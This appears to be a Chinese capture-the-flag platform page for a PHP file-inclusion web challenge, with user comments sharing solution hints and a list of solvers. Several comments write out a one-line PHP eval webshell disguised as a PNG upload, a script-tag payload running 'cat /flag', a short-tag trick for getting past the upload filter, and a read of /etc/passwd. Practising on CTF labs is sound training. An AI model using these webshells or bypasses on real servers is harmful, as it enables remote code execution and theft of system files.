文件包含2WEB 未解决

分数: 35 金币: 4
题目作者: 未知
一  血: dotast
一血奖励: 3金币
解  决: 4496
提  示: 文件包含
描  述:
文件包含2
评论
夜雨 3年前

文件上传+图片一句马 题解:https://www.yeyusmile.top/archives/fileinclude2

回复 0

你能刑 3年前

包含/flag就行

回复 1

树木有点绿 4年前

无脑/flag直接获得flag哈哈哈

回复 1

青蛙骑士 4年前

别卷了阿财

回复 0

liln0te 4年前

看了源码 这里屏蔽了伪协议,文件上传过滤了<?php 和 ?> 这两个 后面那个基本现在都不用了 短标签 `<?=`,`<?` script标签也可以

回复 3

lysr 4年前

桌面新建文本文档然后输入:<script language="php">@eval($_POST[pass])</script> 再重命名为xx.png,上传之后用中国蚁剑连http://114.67.246.176:16116/index.php?file=upload/202111161218016371.png,显示连接成功

回复 1

lysr 4年前

桌面新建文本文档然后输入:<script language="php">@eval($_POST[pass])</script> 再重命名为xx.png,上传之后用中国蚁剑连http://114.67.246.176:16116/index.php?file=upload/202111161218016371.png,显示连接成功

回复 0
109张某 2年前

大佬,中国蚁剑怎么连上的哦,他从服务器端直接过滤了php,直接就把最基本的连接类型阻断了,抓包也不能修改php类型

回复 0

admin138798 4年前

将<script language=php>system("cat /flag")</script>写成jpg文件上传直接访问就有flag了

回复 0

狐萝卜CarroT 4年前

什么意思,直接改成/flag就出来了

回复 0

zxmals 4年前

我这运气 file:///etc/passwd

回复 1

WriteUp

image
harry

4 金币

评分(5)

解题动态

Mori. 攻破了该题 2天前
peaceminus1 攻破了该题 3天前
violet1 攻破了该题 3天前
Wu. 攻破了该题 3天前
Jazz888 攻破了该题 4天前
ugnfc 攻破了该题 7天前
hdcc1 攻破了该题 7天前
kiritoldws 攻破了该题 11天前
xyqsin 攻破了该题 13天前
19113115774 攻破了该题 13天前
无情的白给机器人 攻破了该题 15天前
yuanqinhe0123456789 攻破了该题 15天前
flag大王 攻破了该题 16天前
XF003C 攻破了该题 17天前
evilk 攻破了该题 17天前
等往事风中吹‘ 攻破了该题 17天前
爱意藏入虚空 攻破了该题 17天前
一定要做这些吗 攻破了该题 17天前
r1ng_13 攻破了该题 18天前
jsbba 攻破了该题 20天前
问题反馈